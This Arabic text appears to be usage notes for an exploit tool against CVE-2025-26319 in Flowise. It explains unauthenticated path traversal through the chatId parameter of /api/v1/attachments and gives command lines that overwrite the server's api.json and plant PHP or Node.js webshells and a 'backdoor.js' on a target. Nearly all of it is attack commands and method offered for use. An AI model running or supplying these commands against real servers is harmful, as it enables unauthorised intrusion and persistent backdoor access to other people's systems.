
استغلال لـ CVE-2025-26319 يستهدف نقطة نهاية /api/v1/attachments الخاصة بـ Flowise، مما يمكن من رفع ملف اعتباطي غير مصادق عليه وإنشاء webshell عبر path traversal.
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. إنشاء ورفع Webshell تلقائيًا
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
مبدأ الهجوم استغلال مسار /api/v1/attachments الموجود في القائمة البيضاء، لا يتطلب التحقق من الهوية من خلال التلاعب بمعامل chatId لتنفيذ اجتياز المسار (../../../) رفع أي ملف إلى أي موقع في نظام ملفات الخادم